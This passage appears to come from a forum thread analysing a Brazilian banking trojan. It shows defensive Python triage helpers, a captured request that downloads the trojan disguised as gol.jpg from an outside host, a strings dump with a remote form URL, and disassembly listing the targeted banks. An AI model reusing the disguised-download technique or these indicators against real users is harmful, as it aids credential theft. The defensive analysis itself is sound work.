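    "application/x-shockwave-flash%22%20width%3D%2250%22%20height%3D%2220%22%3E"
    "%20%20%3C/embed%3E%0D%0A%20%20%20%20%0D%0A"
    "%20%20%20%20%3C%21--%20%3Cscript%3Elocation.href%3D%27http%3A//google.com%27"
    "%3C/script%3E%20--%3E%0D%0A%20%20%20%20%3C/body%3E%0D%0A%0D%0A"
    "%20%20%20%20%3C/html%3E%0D%0A"
)

_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(s):
    """Mimic the legacy JavaScript unescape(): %XX -> chr(0xXX), %uXXXX -> chr(0xXXXX).

    Unlike urllib.parse.unquote() this does no UTF-8 decoding, which matches what
    the browser produced for document.write(unescape(Words))."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def decode_words(words):
    """Decode Words exactly as SetNewWords() would, minus the document.write()."""
    return js_unescape(words)


SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
URL_RE = re.compile(r"""https?://[^\s'"<>]+""")


def extract_indicators(html):
    """Pull out what a triage analyst wants from the decoded markup."""
    return {
        "urls": sorted(set(URL_RE.findall(html))),
        "inline_scripts": SCRIPT_RE.findall(html),
        "shell_application": "Shell.Application" in html,
        # ShellExecute whose last argument is 0 (SW_HIDE) launches the file silently.
        "hidden_shell_execute": bool(re.search(r'ShellExecute\b.*"open",\s*0', html)),
    }


# Assumption: Words is assigned a double-quoted JavaScript string literal.
WORDS_DECL_RE = re.compile(r'\bWords\s*=\s*"((?:[^"\\]|\\.)*)"')


def find_words_literal(page_source):
    """Locate the Words literal in the fetched page (declaration form is assumed)."""
    m = WORDS_DECL_RE.search(page_source)
    return m.group(1) if m else None


def triage(page_source):
    """Decode the loader's payload and summarise its indicators; None if no loader found."""
    words = find_words_literal(page_source)
    if words is None:
        return None
    decoded = decode_words(words)
    report = extract_indicators(decoded)
    report["decoded"] = decoded
    return report


# Constructed stand-in for the fetched static.htm: the captured Words fragment
# wrapped in the SetNewWords() loader shown in the strings dump.
SAMPLE_PAGE = (
    "<html><script>\n"
    'var Words = "' + WORDS_FRAGMENT + '";\n'
    "function SetNewWords() {\n"
    "  var NewWords;\n"
    "  NewWords = unescape(Words);\n"
    "  document.write(NewWords);\n"
    "}\n"
    "SetNewWords();\n"
    "// -->\n"
    "</script></html>"
)

if __name__ == "__main__":
    r = triage(SAMPLE_PAGE)
    print(r["decoded"])
    for key in ("urls", "inline_scripts", "shell_application", "hidden_shell_execute"):
        print(key, r[key])
```

Run it against a saved copy of the fetched page instead of SAMPLE_PAGE to get the decoded VBScript and any URLs it references without ever executing the loader.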

>At some point it must create wpabalnm.exe, but I don't see where yet.
It doesn't use the standard CreateFileA function; it uses CreateFileW through the wrapper function CreateFileWrapW, because the filename is in Unicode format.

Ah cool,

that makes sense. Thanks for the input!

V.

more

#####################################################
It creates wpabalnm.exe by downloading:

GET /IMAGES/gol.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: www.attack.com.br
Connection: Keep-Alive

gol.jpg is actually wpabalnm.exe

C:\>md5sum gol.jpg
2b5f69da967ea1ba108a7e187701028d *gol.jpg

C:\>md5sum wpabalnm.exe
2b5f69da967ea1ba108a7e187701028d *wpabalnm.exe

wpabalnm.exe is packed with pecompact 2

There are tons of strings but some interesting ones:

000B6964 004B6964 0 http://www.uonet.com.br/form1.asp

When you go to that URL with Firefox you get a blank page, but wget retrieves a weird file:

00000000 00000000 0
00000007 00000007 0
0000000E 0000000E 0
00000058 00000058 0
000000AF 000000AF 0
00000107 00000107 0
0000016A 0000016A 0
000001BC 000001BC 0
0000020D 0000020D 0
00000276 00000276 0
000002DF 000002DF 0
00000346 00000346 0
00000361 00000361 0 body, td {font-size:76%; font-family:verdana,arial;}
00000396 00000396 0 body {margin:0;}
000003A7 000003A7 0 #page {margin:0;}
000003B9 000003B9 0 #page {background-color:#ffffff;}
000003DB 000003DB 0
0000042B 0000042B 0 #el1{width:100%; position:absolute; margin:20px 0; padding:0; margin-left:-8px; text-align:center; z-index:5;}
0000049A 0000049A 0 #el2{position:relative; padding-right:120px; width:780px; margin-left:auto; margin-right:auto; padding-left:18px;}
0000050D 0000050D 0 #results {background-color:#ffffff; height:100%; width:100%; vertical-align:top; text-align:center;padding-left:10px; padding-top:60px;}
00000596 00000596 0 #results ul {margin:10px 30px 10px 40px; padding:0; text-align:left;}
000005DC 000005DC 0 #results table ul {margin:10px 30px; padding:0;}
0000060D 0000060D 0 #results li { margin:0; padding:2px 0; }
00000636 00000636 0 #results table {width:760px; }
00000655 00000655 0 #results td { width:30%; vertical-align:top;}
00000683 00000683 0 #results table ul { list-style:none; font-weight:bold;}
000006BB 000006BB 0 #results table ul { white-space:nowrap;}
000006E4 000006E4 0 #results .lborder { border:solid #ccc; border-width: 1px; }
00000720 00000720 0 #results td { border:solid #ccc; border-width: 1px 1px 1px 0px; }
00000762 00000762 0 #results td a {color: ##0000ee; font-weight:normal;}
00000797 00000797 0 #results a {font-weight:bold; color: #0000ee;}
000007C6 000007C6 0 #results th p {background:#bdbdbd; color:#000000; font-size:60%; text-align:left; margin-bottom:3px; padding:4px;}
00000839 00000839 0 #results h3 {background: #bdbdbd; color:#000000; font-size:90%; text-align:left; padding-left:10px; margin:20px 20px 3px 20px; }
000008BA 000008BA 0 #results em { color:#999; }
000008D6 000008D6 0 #results .pager { text-align:center; margin-bottom:30px; }
00000911 00000911 0
00000961 00000961 0 #dym {text-align:left; font-weight:normal;font-size:80%; padding-left:4px;}
000009AD 000009AD 0 #dym a {color: #0000ee;}
000009C6 000009C6 0 #error h2, #dym h2 {margin:0; font-weight:normal; color:#ff6500; font-size:160%; padding:0; line-height:1.5em;}
00000A36 00000A36 0 #error p, #error h2 {text-align:justify;}
00000A60 00000A60 0 #error h4 {text-align:center;}
00000A7F 00000A7F 0 #error {text-align:left; margin:auto; width:80%; margin-top:20px;}
00000AC2 00000AC2 0 #dym {color:#222; line-height:2em;}
00000AE8 00000AE8 0 .searchbar {text-align:center; margin:5px auto 0 auto; min-wdith:300px; width:764px;}
00000B3E 00000B3E 0 .searchbar input {margin:2px;}
00000B5D 00000B5D 0 .searchbar img { margin-bottom:-.3em; margin-left:-60px;}
00000B97 00000B97 0 #suggest {width:25em;text-align:left;margin:4px auto; padding-left:78px;}
00000BE1 00000BE1 0 #suggest p {margin:0 0 4px 0; font-size:95%;}
00000C0F 00000C0F 0 #suggest h5 {margin:0 0 2px 0; font-size:95%;}
00000C3E 00000C3E 0 #suggest li {font-size:90%;}
00000C5B 00000C5B 0 #suggest li, #suggest p {white-space:nowrap;}
00000C89 00000C89 0 #suggest li, #suggest ul {margin:0; padding:0; list-style-position:inside;}
00000CD5 00000CD5 0
00000D25 00000D25 0 #skyad {vertical-align:top; background-color:#ffffff; padding:20px 10px 10px 10px;}
00000D79 00000D79 0 #banad {text-align:center; vertical-align:bottom; background-color:#ffffff; height:60px; padding:0; margin:0;}
00000DE8 00000DE8 0 #banad * {width:468px; margin: 0 auto 8px auto; padding:0;}
00000E24 00000E24 0
00000E74 00000E74 0 .keyword { font-weight:bold; }
00000E93 00000E93 0 #error h4 { background:#bbb; padding:4px 8px; font-weight:bold; width:100%; border:solid red;}
00000EF2 00000EF2 0 #results h5 { padding:0; margin:0; }
00000F17 00000F17 0 #results h4, h5 { font-size: 1em; color:#000; }
00000F47 00000F47 0 //-->
00000F4D 00000F4D 0
00000F58 00000F58 0
00000F60 00000F60 0
00000F68 00000F68 0
00000F86 00000F86 0 uniNav(); -->
00000FAA 00000FAA 0
00000FE6 00000FE6 0 chanNav(); -->
00001030 00001030 0
00001041 00001041 0
00001080 00001080 0
000010B5 000010B5 0
000010C4 000010C4 0 The web site address you entered could not be found.
0000110E 0000110E 0 Please try the related content suggestions and paid advertisements below, or try another search.
00001173 00001173 0 You entered "www.uonet.com ".
000011B0 000011B0 0 Did you mean www.duonet.com, www.ugonet.com, or www.donet.com?
00001259 00001259 0 www.someurl.com? -->
0000128F 0000128F 0
00001296 00001296 0 ALSO TRY THE FOLLOWING SUGGESTIONS
000012C1 000012C1 0
000012C7 000012C7 0
000012D2 000012D2 0

00001B43 00001B43 0

00002402 00002402 0

00002CB3 00002CB3 0
00002CC8 00002CC8 0
00002CDD 00002CDD 0
00002D1C 00002D1C 0
00002D81 00002D81 0
00002DC9 00002DC9 0
00002F75 00002F75 0
00002F7D 00002F7D 0
00002F84 00002F84 0
00002F91 00002F91 0
00003206 00003206 0
00003210 00003210 0
0000346A 0000346A 0
00003479 00003479 0
00003493 00003493 0 uniNav(); -->
000034B7 000034B7 0 footInc();-->
000034DA 000034DA 0
000034ED 000034ED 0 footInc_ppc();
0000350E 0000350E 0
0000355A 0000355A 0 2005 EarthLink, Inc.
00003575 00003575 0 All rights reserved.
00003590 00003590 0 Members and visitors to the EarthLink Web site agree to abide by our
000035D7 000035D7 0 Policies and Agreements.
00003633 00003633 0 EarthLink Privacy Policy
00003698 00003698 0 Feedback
000036FC 000036FC 0
00003704 00003704 0
0000370C 0000370C 0
00003716 00003716 0

Some interesting code in the file which seems to indicate some of the data it tries to steal:

CODE:004B7A98 aShellDocobject db 'Shell DocObject View',0 ; DATA XREF: sub_4B7198+3Ao
CODE:004B7AD8 aBancoDoBrasil db 'Banco-do-Brasil',0 ; DATA XREF: sub_4B7198+E3o
CODE:004B7AF0 dword_4B7AF0 dd 32h, 0FFFFFFFFh, 3 ; DATA XREF: sub_4B7198+1A3o
CODE:004B7B14 aHsbc db 'HSBC',0 ; DATA XREF: sub_4B7198+2EEo
CODE:004B7B30 aInvestshop db 'InvestSHOP',0 ; DATA XREF: sub_4B7198+31Bo
CODE:004B7B50 aEquifax db 'EQUIFAX',0 ; DATA XREF: sub_4B7198+35Co
CODE:004B7B6C aUnibanco db 'UNIBANCO',0 ; DATA XREF: sub_4B7198+3EAo
CODE:004B7B8C aItau db 'ITAU',0 ; DATA XREF: sub_4B7198+4F1o
CODE:004B7BA8 aDesco db 'DESCO',0 ; DATA XREF: sub_4B7198+5F8o
CODE:004B7BC4 aReal db 'REAL',0 ; DATA XREF: sub_4B7198+68Bo
CODE:004B7C00 aCitibank db 'CITIBANK',0 ; DATA XREF: sub_4B7198+70Do
CODE:004B7C20 aSantander db 'SANTANDER',0 ; DATA XREF: sub_4B7198+74Eo
CODE:004B7C40 aPaypal db 'PAYPAL',0 ; DATA XREF: sub_4B7198+78Fo
CODE:004B7C74 aRural db 'RURAL',0 ; DATA XREF: sub_4B7198+811o
CODE:004B7C90 aBesc db 'BESC',0 ; DATA XREF: sub_4B7198+84Fo
CODE:004B7CAC aNordeste db 'NORDESTE',0

I was looking at some of the other traffic coming from IE when I access Citibank, which is one of the targets listed in the strings of wpabalnm.exe. I found this stuff, which after looking at it seems to be statistics tracking and ads.

GET /a/s/?BT_PID=99891&BT_CON=1&BT_PM=1&r=0.14543981421417085 HTTP/1.1
Accept: */*
Referer: http://www.citibank.com/us/d.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: citi.bridgetrack.com
Connection: Keep-Alive
Cookie: CitiBT%5F1=; CitiBT=SID=AFF8FE4015BD4406A882B78941937DF3&GUID=140EE61CA903445A99B381A37497B03E

HTTP/1.1 200 OK
Date: Sun, 07 Jan 2007 05:13:21 GMT
Connection: close
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Content-Length: 3374
Content-Type: application/x-javascript
Expires: Sat, 06 Jan 2007 05:13:22 GMT
Set-Cookie: CitiBT=GUID=140EE61CA903445A99B381A37497B03E&SID=AFF8FE4015BD4406A882B78941937DF3; expires=Wed, 02-Jan-2008 05:00:00 GMT; path=/
Cache-control: private

function BTWrite(s) { document.write(s); }
function BTAdClick(szURL) { window.open(szURL,'','width=750,height=550,scrollbars=1,resizable=1,menubar=1,status=1,titlebar=1,toolbar=1'); }
var h = "";
var swf_minversion=5;var swf_maxversion=7;var plugin = false;
if (((navigator.appName == "Netscape") && (navigator.userAgent.indexOf("Mozilla") != -1) &&
(parseFloat(navigator.appVersion) >= 4) && (navigator.javaEnabled()) &&
navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] &&
navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin)) {
var plugname=navigator.plugins['Shockwave Flash'].description;var plugsub=plugname.substring(plugname.indexOf("."),-1); var plugsubstr=plugsub.substr(-1)
if( plugsubstr >= swf_minversion) { plugin = true;}
}
else if (navigator.userAgent && navigator.userAgent.indexOf("MSIE")>=0 &&
(navigator.userAgent.indexOf("Windows 95")>=0 || navigator.userAgent.indexOf("Windows 98")>=0 ||
navigator.userAgent.indexOf("Windows NT")>=0) && document.all)
{
document.write('\n' +
'swf_maxversion = '+swf_maxversion+'\nswf_minversion = '+swf_minversion+'\n' +
'Do\nOn Error Resume Next\nplugin = (IsObject(CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" & swf_maxversion & \"\")))\n' +
'If plugin = true Then Exit Do\nswf_maxversion = swf_maxversion - 1\nLoop While swf_maxversion >= swf_minversion\n' +
'\n');
}
if ( plugin ) {
h += ('' );
h += ('');
h += ('');
h += ('\n' );
h += ('');

BTWrite(h);
} else if (!(navigator.appName && navigator.appName.indexOf("Netscape")>=0 && navigator.appVersion.indexOf("2.")>=0)){
document.write('');
}

I found another file running which turns out to be wpabalnm.exe:
C:\>md5sum sysuphatch.exe
2b5f69da967ea1ba108a7e187701028d *sysuphatch.exe
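Added example, not from the original post: a Python triage helper for the finding that gol.jpg, wpabalnm.exe and sysuphatch.exe are the same PE under different names. It sniffs magic bytes so an "image" that serves an MZ file is flagged regardless of its extension, checks the e_lfanew pointer for a real PE signature, and clusters captured files by MD5 the way the md5sum runs above do. The file bytes are constructed stand-ins, not the real samples.

```python
import hashlib
import os
import struct

# Magic bytes for the formats worth distinguishing here.
MAGIC = [
    (b"MZ", "pe"),                  # DOS stub that every PE begins with
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF8", "gif"),
]
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif"}


def sniff_type(data):
    """Identify a blob by its leading bytes, ignoring whatever name it was served under."""
    for magic, name in MAGIC:
        if data.startswith(magic):
            return name
    return "unknown"


def has_pe_signature(data):
    """Follow e_lfanew (offset 0x3C) and confirm it lands on the 'PE\\0\\0' header."""
    if len(data) < 0x40 or not data.startswith(b"MZ"):
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def is_disguised_executable(name, data):
    """True when the name claims an image but the bytes are an executable."""
    ext = os.path.splitext(name.lower())[1]
    return ext in IMAGE_EXTS and sniff_type(data) == "pe"


def md5_hex(data):
    return hashlib.md5(data).hexdigest()


def group_by_hash(files):
    """Cluster captured artefacts by MD5 so renamed copies are spotted."""
    groups = {}
    for name, data in files.items():
        groups.setdefault(md5_hex(data), []).append(name)
    return {h: sorted(names) for h, names in groups.items()}


def triage(files):
    """Summarise a dict of {filename: bytes} the way the analysis above did by hand."""
    return {
        "disguised": sorted(n for n, d in files.items() if is_disguised_executable(n, d)),
        "valid_pe": sorted(n for n, d in files.items() if has_pe_signature(d)),
        "duplicates": {h: n for h, n in group_by_hash(files).items() if len(n) > 1},
    }


# Constructed sample bytes (not the real malware): a minimal MZ stub whose
# e_lfanew points at a PE signature, and a JPEG SOI/APP0 header.
PE_STUB = b"MZ" + b"\x00" * 58 + struct.pack("<I", 64) + b"PE\x00\x00" + b"\x00" * 16
JPEG_STUB = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"

# Constructed capture mirroring the post: the same binary under three names
# plus one genuine image for contrast.
SAMPLE_FILES = {
    "gol.jpg": PE_STUB,
    "wpabalnm.exe": PE_STUB,
    "sysuphatch.exe": PE_STUB,
    "real_photo.jpg": JPEG_STUB,
}

if __name__ == "__main__":
    report = triage(SAMPLE_FILES)
    print("disguised:", report["disguised"])
    print("valid PE:", report["valid_pe"])
    for digest, names in report["duplicates"].items():
        print(digest, "->", ", ".join(names))
```

Feed it the files pulled from the proxy cache or the Temporary Internet Files directory and the duplicates map gives the same cross-reference the three md5sum runs above give, without relying on the extension the server chose.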

Changed title

The last one sort of implied Einstein wrote the trojan instead of submitting it.